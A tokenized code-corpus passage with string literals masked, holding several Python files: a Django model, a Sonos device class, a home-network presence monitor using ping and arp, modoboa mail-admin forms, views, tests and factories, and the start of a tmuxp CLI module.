CharField ( max_length = <NUM_LIT:1000> , <EOL> blank = False , <EOL> help_text = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> verbose_name = _ ( "<STR_LIT>" ) ) <EOL> correct = models . BooleanField ( blank = False , <EOL> default = False , <EOL> help_text = _ ( "<STR_LIT>" ) , <EOL> verbose_name = _ ( "<STR_LIT>" ) ) <EOL> def __str__ ( self ) : <EOL> return self . content <EOL> class Meta : <EOL> verbose_name = _ ( "<STR_LIT>" ) <EOL> verbose_name_plural = _ ( "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> from google . appengine . ext import ndb <EOL> from appengine import device , pushrpc <EOL> @ device . register ( '<STR_LIT>' ) <EOL> class SonosDevice ( device . Device ) : <EOL> """<STR_LIT>""" <EOL> uid = ndb . StringProperty ( required = True ) <EOL> state = ndb . StringProperty ( ) <EOL> currently_playing = ndb . JsonProperty ( ) <EOL> def get_categories ( self ) : <EOL> return [ '<STR_LIT>' ] <EOL> @ classmethod <EOL> @ device . static_command <EOL> def scan ( cls ) : <EOL> event = { '<STR_LIT:type>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> pushrpc . send_event ( event ) <EOL> def handle_event ( self , event ) : <EOL> """<STR_LIT>""" <EOL> self . populate ( ** event ) </s>
<s> """<STR_LIT>""" <EOL> import collections <EOL> import logging <EOL> import os <EOL> import platform <EOL> import re <EOL> import subprocess <EOL> import time <EOL> import ipaddr <EOL> import netifaces <EOL> import pyping <EOL> from common import detector <EOL> from pi import scanning_proxy <EOL> LINUX_RE = ( r'<STR_LIT>' <EOL> r'<STR_LIT>' <EOL> r'<STR_LIT>' ) <EOL> LINUX_RE = re . compile ( LINUX_RE ) <EOL> MAC_RE = ( r'<STR_LIT>' <EOL> r'<STR_LIT>' <EOL> r'<STR_LIT>' ) <EOL> MAC_RE = re . compile ( MAC_RE ) <EOL> class NetworkMonitor ( scanning_proxy . ScanningProxy ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , callback , scan_period_sec , timeout_secs ) : <EOL> assert os . geteuid ( ) == <NUM_LIT:0> , '<STR_LIT>' <EOL> self . _callback = callback <EOL> self . _timeout_secs = timeout_secs <EOL> self . _ping_frequency_secs = <NUM_LIT> <EOL> self . _hosts = collections . defaultdict ( lambda : False ) <EOL> self . _last_ping = collections . defaultdict ( float ) <EOL> self . _detectors = collections . defaultdict ( detector . AccrualFailureDetector ) <EOL> self . _level_event_frequency_secs = <NUM_LIT:10> * <NUM_LIT> <EOL> self . _last_level_event = <NUM_LIT:0> <EOL> super ( NetworkMonitor , self ) . __init__ ( scan_period_sec ) <EOL> def _ping ( self , ip_address , now ) : <EOL> """<STR_LIT>""" <EOL> if self . _last_ping [ ip_address ] + self . _ping_frequency_secs > now : <EOL> return <EOL> pyping . ping ( ip_address , timeout = <NUM_LIT:1> , count = <NUM_LIT:1> ) <EOL> self . _last_ping [ ip_address ] = now <EOL> def ping_subnet ( self , now ) : <EOL> """<STR_LIT>""" <EOL> if self . _last_ping [ '<STR_LIT>' ] + self . _ping_frequency_secs > now : <EOL> return <EOL> self . _last_ping [ '<STR_LIT>' ] = now <EOL> for interface in netifaces . interfaces ( ) : <EOL> if interface . startswith ( '<STR_LIT>' ) : <EOL> continue <EOL> details = netifaces . ifaddresses ( interface ) <EOL> if netifaces . 
AF_INET not in details : <EOL> continue <EOL> for detail in details [ netifaces . AF_INET ] : <EOL> address = detail . get ( '<STR_LIT>' , None ) <EOL> netmask = detail . get ( '<STR_LIT>' , None ) <EOL> if address is None or netmask is None : <EOL> continue <EOL> parsed = ipaddr . IPv4Network ( '<STR_LIT>' % ( address , netmask ) ) <EOL> logging . debug ( '<STR_LIT>' , parsed . broadcast ) <EOL> pyping . ping ( str ( parsed . broadcast ) , timeout = <NUM_LIT:10> , count = <NUM_LIT:10> ) <EOL> def _arp ( self ) : <EOL> system = platform . system ( ) <EOL> if system == '<STR_LIT>' : <EOL> process = subprocess . Popen ( [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> stdin = None , stdout = subprocess . PIPE , <EOL> stderr = None , close_fds = True ) <EOL> while True : <EOL> line = process . stdout . readline ( ) <EOL> if not line : <EOL> break <EOL> match = MAC_RE . match ( line ) <EOL> if not match : <EOL> logging . error ( '<STR_LIT>' , line . strip ( ) ) <EOL> continue <EOL> mac = match . group ( '<STR_LIT>' ) <EOL> ip_address = match . group ( '<STR_LIT>' ) <EOL> state = '<STR_LIT>' if mac == '<STR_LIT>' else '<STR_LIT>' <EOL> yield ( mac , ip_address , state ) <EOL> elif system == '<STR_LIT>' : <EOL> process = subprocess . Popen ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:list>' ] , <EOL> stdin = None , stdout = subprocess . PIPE , <EOL> stderr = None , close_fds = True ) <EOL> while True : <EOL> line = process . stdout . readline ( ) <EOL> if not line : <EOL> break <EOL> match = LINUX_RE . match ( line ) <EOL> if not match : <EOL> logging . error ( '<STR_LIT>' , line . strip ( ) ) <EOL> continue <EOL> mac = match . group ( '<STR_LIT>' ) <EOL> ip_address = match . group ( '<STR_LIT>' ) <EOL> state = match . group ( '<STR_LIT:state>' ) <EOL> yield ( mac , ip_address , state ) <EOL> def _scan_once ( self ) : <EOL> """<STR_LIT>""" <EOL> now = time . time ( ) <EOL> self . ping_subnet ( now ) <EOL> for mac , ip_address , state in self . _arp ( ) : <EOL> self . 
_ping ( ip_address , now ) <EOL> if state != '<STR_LIT>' : <EOL> continue <EOL> self . _detectors [ mac ] . heartbeat ( now ) <EOL> for mac , dtor in self . _detectors . iteritems ( ) : <EOL> is_alive = dtor . is_alive ( now ) <EOL> if is_alive == self . _hosts [ mac ] : <EOL> continue <EOL> self . _hosts [ mac ] = is_alive <EOL> if is_alive : <EOL> logging . info ( '<STR_LIT>' , mac ) <EOL> self . _callback ( '<STR_LIT>' , None , { '<STR_LIT>' : mac } ) <EOL> else : <EOL> logging . info ( '<STR_LIT>' , mac ) <EOL> self . _callback ( '<STR_LIT>' , None , { '<STR_LIT>' : mac } ) <EOL> if self . _last_level_event + self . _level_event_frequency_secs < now : <EOL> self . _last_level_event = now <EOL> alive = [ mac for mac , dtor in self . _detectors . iteritems ( ) <EOL> if dtor . is_alive ( ) ] <EOL> self . _callback ( '<STR_LIT>' , None , { '<STR_LIT>' : alive } ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> from django import forms <EOL> from django . conf import settings <EOL> from django . utils . translation import ugettext_lazy <EOL> from . . lib import events <EOL> from modoboa . lib import parameters <EOL> from modoboa . lib . form_utils import YesNoField , SeparatorField <EOL> from modoboa . lib . sysutils import exec_cmd <EOL> ADMIN_EVENTS = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> class AdminParametersForm ( parameters . AdminParametersForm ) : <EOL> app = "<STR_LIT>" <EOL> mbsep = SeparatorField ( label = ugettext_lazy ( "<STR_LIT>" ) ) <EOL> handle_mailboxes = YesNoField ( <EOL> label = ugettext_lazy ( "<STR_LIT>" ) , <EOL> initial = "<STR_LIT>" , <EOL> help_text = ugettext_lazy ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> ) <EOL> mailboxes_owner = forms . CharField ( <EOL> label = ugettext_lazy ( "<STR_LIT>" ) , <EOL> initial = "<STR_LIT>" , <EOL> help_text = ugettext_lazy ( <EOL> "<STR_LIT>" <EOL> ) <EOL> ) <EOL> default_domain_quota = forms . 
IntegerField ( <EOL> label = ugettext_lazy ( "<STR_LIT>" ) , <EOL> initial = <NUM_LIT:0> , <EOL> help_text = ugettext_lazy ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> ) <EOL> auto_account_removal = YesNoField ( <EOL> label = ugettext_lazy ( "<STR_LIT>" ) , <EOL> initial = "<STR_LIT>" , <EOL> help_text = ugettext_lazy ( <EOL> "<STR_LIT>" ) <EOL> ) <EOL> auto_create_domain_and_mailbox = YesNoField ( <EOL> label = ugettext_lazy ( "<STR_LIT>" ) , <EOL> initial = "<STR_LIT:yes>" , <EOL> help_text = ugettext_lazy ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> ) <EOL> visibility_rules = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( AdminParametersForm , self ) . __init__ ( * args , ** kwargs ) <EOL> self . field_widths = { <EOL> "<STR_LIT>" : <NUM_LIT:2> <EOL> } <EOL> hide_fields = False <EOL> dpath = None <EOL> code , output = exec_cmd ( "<STR_LIT>" ) <EOL> if not code : <EOL> dpath = output . strip ( ) <EOL> else : <EOL> known_paths = getattr ( <EOL> settings , "<STR_LIT>" , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> ) <EOL> for fpath in known_paths : <EOL> if os . path . isfile ( fpath ) and os . access ( fpath , os . X_OK ) : <EOL> dpath = fpath <EOL> if dpath : <EOL> try : <EOL> code , version = exec_cmd ( "<STR_LIT>" % dpath ) <EOL> except OSError : <EOL> hide_fields = True <EOL> else : <EOL> if code or not version . strip ( ) . startswith ( "<STR_LIT:2>" ) : <EOL> hide_fields = True <EOL> else : <EOL> hide_fields = True <EOL> if hide_fields : <EOL> del self . fields [ "<STR_LIT>" ] <EOL> del self . fields [ "<STR_LIT>" ] <EOL> def clean_default_domain_quota ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . cleaned_data [ '<STR_LIT>' ] < <NUM_LIT:0> : <EOL> raise forms . ValidationError ( <EOL> ugettext_lazy ( '<STR_LIT>' ) <EOL> ) <EOL> return self . cleaned_data [ '<STR_LIT>' ] <EOL> def load_admin_settings ( ) : <EOL> """<STR_LIT>""" <EOL> from . 
app_settings import AdminParametersForm <EOL> parameters . register ( <EOL> AdminParametersForm , ugettext_lazy ( "<STR_LIT>" ) ) <EOL> events . declare ( ADMIN_EVENTS ) <EOL> from . import callbacks </s>
<s> """<STR_LIT>""" <EOL> from django import template <EOL> from django . core . urlresolvers import reverse <EOL> from django . template . loader import render_to_string <EOL> from django . utils . safestring import mark_safe <EOL> from django . utils . translation import ugettext as _ , ugettext_lazy <EOL> from modoboa . lib import events <EOL> from modoboa . lib . templatetags . lib_tags import render_link <EOL> from modoboa . lib . web_utils import render_actions <EOL> from . . import signals <EOL> register = template . Library ( ) <EOL> genders = { <EOL> "<STR_LIT>" : ( ugettext_lazy ( "<STR_LIT>" ) , ugettext_lazy ( "<STR_LIT>" ) ) <EOL> } <EOL> @ register . simple_tag <EOL> def domains_menu ( selection , user , ajax_mode = True ) : <EOL> """<STR_LIT>""" <EOL> domain_list_url = ( <EOL> "<STR_LIT>" if ajax_mode else reverse ( "<STR_LIT>" ) <EOL> ) <EOL> entries = [ <EOL> { "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT:label>" : _ ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:class>" : "<STR_LIT>" , <EOL> "<STR_LIT:url>" : domain_list_url } , <EOL> { "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT:label>" : _ ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:class>" : "<STR_LIT>" , <EOL> "<STR_LIT:url>" : reverse ( "<STR_LIT>" ) } <EOL> ] <EOL> if user . has_perm ( "<STR_LIT>" ) : <EOL> entries += [ <EOL> { "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT:label>" : _ ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:url>" : reverse ( "<STR_LIT>" ) } , <EOL> ] <EOL> entries += events . 
raiseQueryEvent ( "<STR_LIT>" , user ) <EOL> entries += [ <EOL> { "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT:label>" : _ ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:url>" : reverse ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : "<STR_LIT>" } , <EOL> { "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT:label>" : _ ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:url>" : reverse ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : "<STR_LIT>" } <EOL> ] <EOL> return render_to_string ( '<STR_LIT>' , { <EOL> "<STR_LIT>" : entries , <EOL> "<STR_LIT>" : selection , <EOL> "<STR_LIT:user>" : user <EOL> } ) <EOL> @ register . simple_tag <EOL> def identities_menu ( user , selection = None ) : <EOL> """<STR_LIT>""" <EOL> entries = [ <EOL> { "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT:label>" : _ ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:class>" : "<STR_LIT>" , <EOL> "<STR_LIT:url>" : "<STR_LIT>" } , <EOL> { "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT:label>" : _ ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:class>" : "<STR_LIT>" , <EOL> "<STR_LIT:url>" : "<STR_LIT>" } , <EOL> { "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT:label>" : _ ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:url>" : reverse ( "<STR_LIT>" ) } , <EOL> { "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT:label>" : _ ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:url>" : reverse ( "<STR_LIT>" ) } , <EOL> { "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT:label>" : _ ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:url>" : reverse ( "<STR_LIT>" ) } , <EOL> { "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT:label>" : _ ( "<STR_LIT>" ) , 
<EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:url>" : reverse ( "<STR_LIT>" ) } , <EOL> { "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT:label>" : _ ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:url>" : reverse ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : "<STR_LIT>" } , <EOL> { "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT:label>" : _ ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:url>" : reverse ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> ] <EOL> return render_to_string ( '<STR_LIT>' , { <EOL> "<STR_LIT>" : entries , <EOL> "<STR_LIT:user>" : user <EOL> } ) <EOL> @ register . simple_tag <EOL> def domain_actions ( user , domain ) : <EOL> actions = [ <EOL> { "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT:url>" : u"<STR_LIT>" . format ( <EOL> reverse ( "<STR_LIT>" ) , domain . name ) , <EOL> "<STR_LIT:title>" : _ ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" : "<STR_LIT>" } <EOL> ] <EOL> if user . has_perm ( "<STR_LIT>" ) : <EOL> actions . append ( { <EOL> "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT:url>" : reverse ( "<STR_LIT>" , args = [ domain . id ] ) , <EOL> "<STR_LIT:title>" : _ ( "<STR_LIT>" % domain . name ) , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } ) <EOL> responses = signals . extra_domain_actions . send ( <EOL> sender = None , user = user , domain = domain ) <EOL> for receiver , response in responses : <EOL> if response : <EOL> actions += response <EOL> return render_actions ( actions ) <EOL> @ register . simple_tag <EOL> def identity_actions ( user , ident ) : <EOL> name = ident . __class__ . __name__ <EOL> objid = ident . id <EOL> if name == "<STR_LIT>" : <EOL> actions = events . 
raiseQueryEvent ( "<STR_LIT>" , ident ) <EOL> actions += [ <EOL> { "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT:url>" : reverse ( "<STR_LIT>" , args = [ objid ] ) , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:title>" : _ ( "<STR_LIT>" % ident . username ) } , <EOL> ] <EOL> else : <EOL> actions = [ <EOL> { "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT:url>" : "<STR_LIT>" . format ( <EOL> reverse ( "<STR_LIT>" ) , objid ) , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:title>" : _ ( "<STR_LIT>" % ident . address ) } , <EOL> ] <EOL> return render_actions ( actions ) <EOL> @ register . simple_tag <EOL> def check_identity_status ( identity ) : <EOL> """<STR_LIT>""" <EOL> if identity . __class__ . __name__ == "<STR_LIT>" : <EOL> if hasattr ( identity , "<STR_LIT>" ) and not identity . mailbox . domain . enabled : <EOL> return False <EOL> elif not identity . is_active : <EOL> return False <EOL> elif not identity . enabled or not identity . domain . enabled : <EOL> return False <EOL> return True <EOL> @ register . simple_tag <EOL> def domain_modify_link ( domain ) : <EOL> linkdef = { "<STR_LIT:label>" : domain . name , "<STR_LIT>" : True } <EOL> if domain . __class__ . __name__ == "<STR_LIT>" : <EOL> linkdef [ "<STR_LIT:url>" ] = reverse ( <EOL> "<STR_LIT>" , args = [ domain . id ] ) <EOL> linkdef [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> else : <EOL> tmp = events . raiseDictEvent ( '<STR_LIT>' , domain ) <EOL> for key in [ '<STR_LIT:url>' , '<STR_LIT>' ] : <EOL> linkdef [ key ] = tmp [ key ] <EOL> return render_link ( linkdef ) <EOL> @ register . simple_tag <EOL> def domain_aliases ( domain ) : <EOL> """<STR_LIT>""" <EOL> if not domain . aliases . count ( ) : <EOL> return '<STR_LIT>' <EOL> res = '<STR_LIT>' <EOL> for alias in domain . aliases . all ( ) : <EOL> res += '<STR_LIT>' % alias . name <EOL> return mark_safe ( res ) <EOL> @ register . 
simple_tag <EOL> def identity_modify_link ( identity , active_tab = '<STR_LIT:default>' ) : <EOL> """<STR_LIT>""" <EOL> linkdef = { "<STR_LIT:label>" : identity . identity , "<STR_LIT>" : True } <EOL> if identity . __class__ . __name__ == "<STR_LIT>" : <EOL> linkdef [ "<STR_LIT:url>" ] = reverse ( "<STR_LIT>" , args = [ identity . id ] ) <EOL> linkdef [ "<STR_LIT:url>" ] += "<STR_LIT>" % active_tab <EOL> linkdef [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> else : <EOL> linkdef [ "<STR_LIT:url>" ] = reverse ( "<STR_LIT>" , args = [ identity . id ] ) <EOL> linkdef [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> return render_link ( linkdef ) <EOL> @ register . simple_tag <EOL> def domadmin_actions ( daid , domid ) : <EOL> actions = [ { <EOL> "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT:url>" : "<STR_LIT>" . format ( <EOL> reverse ( "<STR_LIT>" ) , domid , daid ) , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:title>" : _ ( "<STR_LIT>" ) <EOL> } ] <EOL> return render_actions ( actions ) <EOL> @ register . filter <EOL> def gender ( value , target ) : <EOL> if value in genders : <EOL> trans = target == "<STR_LIT:m>" and genders [ value ] [ <NUM_LIT:0> ] or genders [ value ] [ <NUM_LIT:1> ] <EOL> if trans . find ( "<STR_LIT:_>" ) == - <NUM_LIT:1> : <EOL> return trans <EOL> return value <EOL> @ register . simple_tag <EOL> def get_extra_admin_content ( user , target , currentpage ) : <EOL> res = events . raiseQueryEvent ( <EOL> "<STR_LIT>" , user , target , currentpage <EOL> ) <EOL> return mark_safe ( "<STR_LIT>" . join ( res ) ) </s>
<s> """<STR_LIT>""" <EOL> from modoboa . lib import events , parameters <EOL> def top_notifications ( request ) : <EOL> """<STR_LIT>""" <EOL> if request . user . is_anonymous ( ) : <EOL> return { } <EOL> return { <EOL> "<STR_LIT>" : <EOL> int ( parameters . get_admin ( "<STR_LIT>" ) ) * <NUM_LIT:1000> , <EOL> "<STR_LIT>" : events . raiseQueryEvent ( <EOL> "<STR_LIT>" , request , False ) <EOL> } </s>
<s> """<STR_LIT>""" <EOL> from django . shortcuts import render <EOL> from django . utils import translation <EOL> from django . utils . translation import ugettext as _ <EOL> from django . contrib . auth . decorators import login_required , user_passes_test <EOL> from rest_framework . authtoken . models import Token <EOL> from modoboa . lib import events , parameters <EOL> from modoboa . lib . cryptutils import encrypt <EOL> from modoboa . lib . web_utils import ( <EOL> _render_to_string , render_to_json_response <EOL> ) <EOL> from . . forms import ProfileForm , APIAccessForm <EOL> @ login_required <EOL> def index ( request , tplname = "<STR_LIT>" ) : <EOL> extrajs = events . raiseQueryEvent ( "<STR_LIT>" , request . user ) <EOL> return render ( request , tplname , { <EOL> "<STR_LIT>" : "<STR_LIT:user>" , <EOL> "<STR_LIT>" : "<STR_LIT>" . join ( extrajs ) <EOL> } ) <EOL> @ login_required <EOL> def profile ( request , tplname = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> update_password = True <EOL> if True in events . raiseQueryEvent ( "<STR_LIT>" , request . user ) : <EOL> update_password = False <EOL> if request . method == "<STR_LIT:POST>" : <EOL> form = ProfileForm ( <EOL> update_password , request . POST , instance = request . user <EOL> ) <EOL> if form . is_valid ( ) : <EOL> form . save ( ) <EOL> if update_password and form . cleaned_data [ "<STR_LIT>" ] != "<STR_LIT>" : <EOL> request . session [ "<STR_LIT:password>" ] = encrypt ( <EOL> form . cleaned_data [ "<STR_LIT>" ] ) <EOL> translation . activate ( request . user . language ) <EOL> request . session [ translation . LANGUAGE_SESSION_KEY ] = ( <EOL> request . user . language ) <EOL> return render_to_json_response ( _ ( "<STR_LIT>" ) ) <EOL> return render_to_json_response ( <EOL> { '<STR_LIT>' : form . errors } , status = <NUM_LIT> ) <EOL> form = ProfileForm ( update_password , instance = request . 
user ) <EOL> return render_to_json_response ( { <EOL> "<STR_LIT:content>" : _render_to_string ( request , tplname , { <EOL> "<STR_LIT>" : form <EOL> } ) <EOL> } ) <EOL> @ login_required <EOL> def preferences ( request ) : <EOL> if request . method == "<STR_LIT:POST>" : <EOL> for formdef in parameters . get_user_forms ( request . user , request . POST ) : <EOL> form = formdef [ "<STR_LIT>" ] <EOL> if form . is_valid ( ) : <EOL> form . save ( ) <EOL> continue <EOL> return render_to_json_response ( { <EOL> "<STR_LIT>" : form . app , "<STR_LIT>" : form . errors <EOL> } , status = <NUM_LIT> ) <EOL> return render_to_json_response ( _ ( "<STR_LIT>" ) ) <EOL> return render_to_json_response ( { <EOL> "<STR_LIT:content>" : _render_to_string ( request , "<STR_LIT>" , { <EOL> "<STR_LIT>" : parameters . get_user_forms ( request . user ) <EOL> } ) <EOL> } ) <EOL> @ login_required <EOL> @ user_passes_test ( lambda u : u . is_superuser ) <EOL> def api_access ( request ) : <EOL> """<STR_LIT>""" <EOL> if request . method == "<STR_LIT:POST>" : <EOL> form = APIAccessForm ( request . POST , user = request . user ) <EOL> if form . is_valid ( ) : <EOL> if form . cleaned_data . get ( "<STR_LIT>" ) : <EOL> Token . objects . get_or_create ( user = request . user ) <EOL> else : <EOL> Token . objects . filter ( user = request . user ) . delete ( ) <EOL> return render_to_json_response ( _ ( "<STR_LIT>" ) ) <EOL> return render_to_json_response ( { <EOL> "<STR_LIT>" : form . errors <EOL> } , status = <NUM_LIT> ) <EOL> form = APIAccessForm ( user = request . user ) <EOL> return render_to_json_response ( { <EOL> "<STR_LIT:content>" : _render_to_string ( <EOL> request , "<STR_LIT>" , { "<STR_LIT>" : form } ) <EOL> } ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import tempfile <EOL> from . sysutils import exec_cmd <EOL> class MapFilesTestCaseMixin ( object ) : <EOL> """<STR_LIT>""" <EOL> MAP_FILES = None <EOL> extension = None <EOL> def setUp ( self ) : <EOL> self . workdir = tempfile . mkdtemp ( ) <EOL> def tearDown ( self ) : <EOL> exec_cmd ( "<STR_LIT>" . format ( self . workdir ) ) <EOL> def _test_maps_generation ( self , engine ) : <EOL> dburl = "<STR_LIT>" . format ( engine ) <EOL> code , output = exec_cmd ( <EOL> "<STR_LIT>" . format ( <EOL> "<STR_LIT>" . format ( self . extension ) <EOL> if self . extension else "<STR_LIT>" , dburl , self . workdir <EOL> ) <EOL> ) <EOL> self . assertEqual ( code , <NUM_LIT:0> ) <EOL> for mapfile in self . MAP_FILES : <EOL> path = "<STR_LIT>" . format ( self . workdir , mapfile ) <EOL> self . assertTrue ( os . path . exists ( path ) ) <EOL> with open ( path ) as fpo : <EOL> content = fpo . read ( ) <EOL> if engine != "<STR_LIT>" : <EOL> self . assertIn ( "<STR_LIT>" , content ) <EOL> self . assertIn ( "<STR_LIT>" , content ) <EOL> self . assertIn ( "<STR_LIT>" , content ) <EOL> self . assertIn ( "<STR_LIT>" , content ) <EOL> else : <EOL> self . assertIn ( "<STR_LIT>" , content ) <EOL> def test_postgres_maps ( self ) : <EOL> self . _test_maps_generation ( "<STR_LIT>" ) <EOL> def test_mysql_maps ( self ) : <EOL> self . _test_maps_generation ( "<STR_LIT>" ) <EOL> def test_sqlite_maps ( self ) : <EOL> self . _test_maps_generation ( "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> import factory <EOL> from modoboa . admin . factories import DomainFactory <EOL> from modoboa . core . factories import PermissionFactory <EOL> from . import models <EOL> class ServiceFactory ( factory . DjangoModelFactory ) : <EOL> """<STR_LIT>""" <EOL> class Meta : <EOL> model = models . Service <EOL> django_get_or_create = ( '<STR_LIT:name>' , ) <EOL> name = '<STR_LIT>' <EOL> class RelayDomainFactory ( PermissionFactory ) : <EOL> """<STR_LIT>""" <EOL> class Meta : <EOL> model = models . RelayDomain <EOL> domain = factory . SubFactory ( DomainFactory ) <EOL> target_host = '<STR_LIT>' <EOL> verify_recipients = True <EOL> service = factory . SubFactory ( ServiceFactory ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import , division , print_function , with_statement , unicode_literals <EOL> import argparse <EOL> import logging <EOL> import os <EOL> import sys <EOL> import argcomplete <EOL> import kaptan <EOL> from . import log , util , exc , WorkspaceBuilder , Server , config <EOL> from . __about__ import __version__ <EOL> from . _compat import input , string_types <EOL> from . workspacebuilder import freeze <EOL> logger = logging . getLogger ( __name__ ) <EOL> config_dir = os . path . expanduser ( '<STR_LIT>' ) <EOL> cwd_dir = os . getcwd ( ) + '<STR_LIT:/>' <EOL> tmuxinator_config_dir = os . path . expanduser ( '<STR_LIT>' ) <EOL> teamocil_config_dir = os . path . expanduser ( '<STR_LIT>' ) <EOL> def prompt ( name , default = None ) : <EOL> """<STR_LIT>""" <EOL> prompt = name + ( default and '<STR_LIT>' % default or '<STR_LIT>' ) <EOL> prompt += name . endswith ( '<STR_LIT:?>' ) and '<STR_LIT:U+0020>' or '<STR_LIT>' <EOL> while True : <EOL> rv = input ( prompt ) <EOL> if rv : <EOL> return rv <EOL> if default is not None : <EOL> return default <EOL> def prompt_bool ( name , default = False , yes_choices = None , no_choices = None ) : <EOL> """<STR_LIT>""" <EOL> yes_choices = yes_choices or ( '<STR_LIT:y>' , '<STR_LIT:yes>' , '<STR_LIT:1>' , '<STR_LIT>' , '<STR_LIT:true>' , '<STR_LIT:t>' ) <EOL> no_choices = no_choices or ( '<STR_LIT:n>' , '<STR_LIT>' , '<STR_LIT:0>' , '<STR_LIT>' , '<STR_LIT:false>' , '<STR_LIT:f>' ) <EOL> if default is None : <EOL> prompt_choice = '<STR_LIT>' <EOL> elif default is True : <EOL> prompt_choice = '<STR_LIT>' <EOL> else : <EOL> prompt_choice = '<STR_LIT>' <EOL> prompt = name + '<STR_LIT>' % prompt_choice <EOL> prompt += name . endswith ( '<STR_LIT:?>' ) and '<STR_LIT:U+0020>' or 